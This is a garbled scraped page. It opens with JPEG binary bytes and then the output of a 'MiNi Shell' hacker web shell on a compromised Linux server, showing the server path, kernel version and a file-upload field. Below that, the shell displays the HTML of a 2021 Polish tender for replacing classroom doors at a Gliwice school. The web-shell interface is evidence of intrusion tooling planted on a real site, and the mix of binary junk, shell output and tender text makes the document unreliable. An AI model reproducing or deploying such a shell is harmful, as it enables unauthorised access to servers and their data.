JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210624/0009414001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00094140 z dnia 2021-06-24</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont sal dydaktycznych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ SZKÓŁ OGÓLNOKSZTAŁCĄCYCH NR 14 W GLIWICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 240419813</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Przedwiośnie 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gliwice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-119</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">322370288</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">brak</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zso14.gliwice.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.sp14gliwice.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont sal dydaktycznych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-20b71276-d4e5-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00094140</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000591/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Remont sal dydaktycznych.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zso14.bip.gliwice.eu/zamowieniaPubliczne <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny<br/>jest pod adresem:<br/>https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty<br/>elektronicznej<br/>2) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących <br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza<br/>do komunikacji”,<br/>3) wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych<br/>kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały<br/>w Regulaminie korzystania z miniPortalu https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Warunkach<br/>korzystania z elektronicznej platformy usług administracji publicznej (ePUAP)<br/>https://www.gov.pl/web/gov/warunki-korzystania,<br/>4) maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB,<br/>5) za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania<br/>na ePUAP.6) składane przez wykonawców zapytania do specyfikacji powinny być opatrzone zapisem:<br/>"Zapytanie do specyfikacji warunków zamówienia dotyczące zadania pod nazwą:<br/> Remont sal dydaktycznych."<br/>7) zamawiający nie odpowiada za wyjaśnienia udzielane Wykonawcom przez inne osoby i instytucje<br/>nieuprawnione do bezpośredniego kontaktowania się z wykonawcami, niż wymienione w niniejszej SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja zawarta w rozdziale 27 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacja zawarta w rozdziale 27 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/2021/R</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane związane z remontem sal i pomieszczeń szkolnych – wymiana<br/>drzwi (skrzydeł i ościeżnic) wraz z wykonaniem prac towarzyszących wymianie, w tym uzupełniających prac<br/>wykończeniowych takich jak: malarskie, posadzkarskie, okładzinowe, tynkarskie.<br/>Podstawowy zakres robót:<br/>1) demontaż istniejącej stolarki drzwiowej w miejscach wskazanych na załączniku graficznym (załącznik nr 15,<br/>załącznik nr 16),<br/>2) montaż nowej stolarki drzwiowej (montaż na dyblach) w miejscach wskazanych na załączniku graficznym<br/>(załącznik nr 15, załącznik nr 16),<br/>3) Wszelkie prace towarzyszące wymianie drzwi i ościeżnic w tym uzupełniające prace wykończeniowe takie<br/>jak: malarskie, posadzkarskie, okładzinowe, tynkarskie i inne konieczne do odtworzenia stanu istniejącego<br/>przed wymianą drzwi.<br/>Planowania ilość drzwi do wymiany:<br/>- parter- 18 szt.<br/>- piętro- 18 szt.<br/>Wykonawca, dodatkowo, w ramach realizacji przedmiotu zamówienia i w ramach zaoferowanej ceny:a) pokryje koszty zużycia wody, energii elektrycznej, w wysokości ryczałtowej 500 złotych brutto,<br/>b) wykona zabezpieczenie podłóg i posadzek przed uszkodzeniem, zabrudzeniem, zapyleniem w związku<br/>z realizacją robót,<br/>c) wykona zabezpieczenie istniejącego wyposażenia, sprzętu, mebli, itp. w związku z realizacją robót,<br/>d) zabezpieczy sąsiadujące pomieszczenia przed zapyleniem w związku z realizacją robót<br/>e) na bieżąco będzie utrzymywał porządek i wykonywał prace porządkowe,<br/>f) wywiezie i podda utylizacji wszelkie odpady,<br/>g) przekaże: dokumentację powykonawczą, wszelkie atesty na materiały,<br/>h) zorganizuje własne zaplecze na potrzeby budowy, w tym przenośne toalety, w miejscu uzgodnionym<br/>z Zamawiającym,<br/>i) zabezpieczy teren robót przed dostępem osób trzecich<br/>j) uzgodni z Zamawiającym kolorystykę do malowania ścian i sufitów, kolorystykę okładzin ściennych<br/>posadzek, itp.,<br/>k) zapewni stosowanie i przestrzeganie zasad sanitarnych wynikających ze stanu epidemii<br/>WYMAGANIA DOTYCZĄCE STOLARKI DRZWIOWEJ.<br/>Wszystkie materiały zastosowane do realizacji robot powinny odpowiadać, co do jakości wymogom wyrobów<br/>dopuszczonych do obrotu i stosowania w budownictwie, określonym w art. 10 ustawy Prawo Budowlane.<br/>Zamawiający określa następujące wymagania jakościowe dla stolarki drzwiowej:<br/>1) skrzydło drzwiowe:<br/>a) opis ogólny wymagań:<br/>drzwi drewniane wewnętrzne przeznaczone do stosowania w budownictwie użyteczności publicznej jako drzwi<br/>wewnętrzne stanowiące zamknięcie otworów w ścianach wewnętrznych tzw. drzwi wzmocnione<br/>wewnątrzlokalowe. Z uwagi na wymagania wytrzymałościowe ww. drzwi mogą być stosowane w warunkach<br/>odpowiadających 3 klasie wymagań wg PN-EN 1192:2001 lub równoważnej.<br/>Drzwi jednoskrzydłowe, z przeszkleniem w górnej części drzwi o wymiarach od 35x35 cm do 50x50 cm.<br/>Szczegóły przeszklenia – wg punktu litera c)<br/>Wymiary drzwi w świetle ościeżnicy: szerokość: 90 cm, wysokość: 200 cm z tolerancją + 1cm.<br/>Skrzydło drzwiowe wyposażone w: zamek pod wkładkę patentową i wkładkę patentową oraz trzy klucze,<br/>klamkę bezpieczną, trzy zawiasy wzmocnione trójelementowe, skrzydło okleinowane CPL grubości 0,7<br/>mm-kolor popielaty, zbliżony do RAL 7040 , klamka bezpieczna, szyldy do klamki i do zamka ze stali<br/>nierdzewnej, panel dolny – wg punktu litera d), obrzeża na krawędziach skrzydła – wg punktu litera b) tiret<br/>piąty.<br/>b) konstrukcja skrzydła:<br/>pokrycie: okleina CPL 0,7 mm kolor popielaty, zbliżony do RAL 7040,<br/>poszycie: płyta HDF,<br/>wypełnienie: płyta wiórowa otworowa,<br/>rama skrzydła: z klejonki drewnianej,<br/>obrzeże: pionowe krawędzie drzwi osłonięte listwami ze stali nierdzewnej grubości 0,6 mm. Górna krawędź<br/>oklejona taśmą obrzeżową w kolorze skrzydła<br/>c) przeszklenie skrzydła:<br/>szyba przezierna, grubości 4 – 6 mm,<br/>szyby bezpieczna hartowana lub klejona,<br/>ramki przyszybowe ze stali nierdzewnej,<br/>wymiary przeszklenia: od 35x35 cm do 50x50 cm<br/>d) panel ochronny zamocowany z dwóch stron skrzydła na dole tzw. okopnik:<br/>panel ze stali nierdzewnej o grubości 0,6 mm,<br/>wysokość panelu 300 mm z tolerancja +/- 25 mm<br/>szerokość panelu – na szerokość skrzydła drzwiowego<br/>2) ościeżnica:<br/>a) ościeżnica metalowa kątowa, szerokości 100-105 mm, wykonana z blachy stalowej o grubości 1,2-1,5 mm,<br/>lakierowana proszkowo w kolorze popielatym zbliżonym do RAL 7035,<br/>b) ościeżnica wyposażona w sześć dybli montażowych, uszczelkę gumową obwiedniową,<br/>Szczegółowy opis przedmiotu zamówienia zawarty jest w następujących opracowaniach:<br/>a) rysunek lokalizacji drzwi planowanych do wymiany w ramach niniejszego zamówienia-rzut parteru -<br/>załącznik nr 15 do niniejszej Specyfikacji Warunków Zamówienia (SWZ),<br/>b) rysunek lokalizacji drzwi planowanych do wymiany w ramach niniejszego zamówienia-rzut piętra - załącznik<br/>nr 16 do niniejszej Specyfikacji Warunków Zamówienia (SWZ),<br/>c) przedmiar robót - załącznik nr 6 do niniejszej Specyfikacji Warunków Zamówienia (SWZ),<br/>Uwaga: przedmiar robót należy traktować jako element pomocniczy przy obliczaniu ceny oferty. Wykonawcazobowiązuje się wykonać roboty budowlane, które nie zostały wyszczególnione w przedmiarze robót, a są<br/>konieczne do realizacji przedmiotu umowy zgodnie z wiedzą techniczną oraz dla kompletności<br/>dzieła-doprowadzenie do stanu istniejącego.<br/>Wykonawca powinien sprawdzić wymiary i kierunek otwierania drzwi przed złożeniem oferty oraz przed<br/>zamontowaniem drzwi.<br/>Wymagany okres gwarancji: min. 36 miesięcy, max. 72 miesiące licząc od dnia końcowego odbioru robót<br/>potwierdzonego protokołem odbioru bez zastrzeżeń,<br/>Wymagany okres rękojmi: min. 36 miesięcy, max. 72 miesiące licząc od dnia końcowego odbioru robót<br/>potwierdzonego protokołem odbioru bez zastrzeżeń.<br/>Zamawiający wymaga, aby zaoferowany okres gwarancji i rękojmi był taki sam.<br/>Zamawiający dopuszcza przeprowadzenie przez Wykonawcę (przed złożeniem oferty) wizji lokalnej miejsca<br/>robót objętego przedmiotem zamówienia, po uprzednim uzgodnieniu terminu z Zamawiającym.<br/>Inne wymagania:<br/>a) wykonawca zastosuje do realizacji przedmiotu zamówienia tylko fabrycznie nowe materiały, urządzenia oraz<br/>wyposażenie<br/>b) przy przygotowaniu oferty i realizacji robót Wykonawca winien uwzględnić specyfikę pracy w czynnych<br/>obiektach oświatowych.<br/>c) wykonywanie robót jest możliwe od poniedziałku do piątku, od godziny 6.00 do godziny 21.00.<br/>d) wykonywanie robót musi być tak prowadzone, aby była zapewniona ciągłość pracy placówki<br/>e) głośne prace mogą być wykonywane w takim czasie, aby nie utrudniać funkcjonowania placówki – termin<br/>wykonywania tych prac wykonawca winien uzgodnić z placówką przed rozpoczęciem tych prac. W okresie<br/>roku szkolnego głośne prace mogą wykonywane od godziny 14 do godziny 21 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45262321-7 - Wyrównywanie podłóg</p> <p class="mb-0">45262522-6 - Roboty murarskie</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421130-4 - Instalowanie drzwi i okien</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45431200-9 - Kładzenie glazury</p> <p class="mb-0">45432110-8 - Kładzenie podłóg</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Powtórzenie podobnych robót budowlanych w zakresie remontu sal dydaktycznych, w zależności od zapotrzebowania i aktualnych możliwości finansowych zamawiającego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">zamawiający udzieli zamówienia Wykonawcy, którego oferta jest zgodna z warunkami zamówienia oraz<br/>ustawa pzp i została oceniona jako najkorzystniejsza w oparciu o podane kryterium/kryteria wyboru</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O zamówienie mogą ubiegać się wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie,<br/>w szczególności zgodnie z przepisami prawa budowlanego i prawidłowo ukończyli<br/>a) jedną robotę budowlaną polegającą na: budowie lub przebudowie lub remoncie budynków, pomieszczeń<br/>itp., obejmujące między innymi montaż lub wymianę stolarki drzwiowej.<br/>Wartość brutto każdej z ukończonych robót nie mniejsza niż 70 000,00 zł.<br/>Zdolność techniczna dla podmiotów występujących wspólnie będzie oceniana łącznie dla wszystkich<br/>podmiotów.<br/>O zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować osobami zdolnymi<br/>do wykonania zamówienia, to znaczy:<br/>a) co najmniej 1 osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności<br/>konstrukcyjno-budowlanej<br/>Wskazane powyżej uprawnienia budowlane muszą być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo<br/>budowlane (t.j. Dz. U. z 2020 r. poz. 13333 z późn. zm.) oraz Rozporządzeniem Ministra Inwestycji i Rozwoju<br/>z 29 kwietnia 2019 r. (Dz.U. z 2019 r. poz. 831) w sprawie przygotowania zawodowego do wykonywania<br/>samodzielnych funkcji technicznych w budownictwie lub odpowiadającymi im ważnymi uprawnieniami<br/>budowlanymi, wydanymi na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednimi<br/>przepisami obowiązującymi na terenie kraju, z którego pochodzi dana osoba, które w zakresie objętym<br/>zamówieniem pozwalać będą na pełnienie samodzielnych funkcji technicznych w budownictwie w ww.specjalnościach.<br/>Zdolność zawodowa dla podmiotów występujących wspólnie będzie oceniana łącznie dla wszystkich<br/>podmiotów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 108 ust. 1 pkt 1, 2, 4<br/>ustawy pzp, sporządzona nie wcześniej niż 6 miesięcy przed jej złożeniem.<br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast powyższego dokumentu składa informację z odpowiedniego rejestru takiego jak rejestr<br/>sądowy, albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy<br/>• organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,<br/>w zakresie określonym w powyższych przepisach ustawy pzp, wystawiony nie wcześniej niż 6 miesięcy<br/>przed jego złożeniem,<br/>odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzona nie wcześniej niż<br/>3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast powyższego dokumentu składa dokument lub dokumenty wystawione w kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie<br/>ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami,<br/>jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury,<br/>wystawione nie wcześniej niż 3 miesiące przed ich złożeniem,<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa powyżej w niniejszym punkcie, lub gdy dokumenty te nie odnoszą się<br/>do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1, 2 lit. a i b<br/>oraz pkt 3 ustawy pzp, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym<br/>odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą lub, jeżeli<br/>w kraju, w 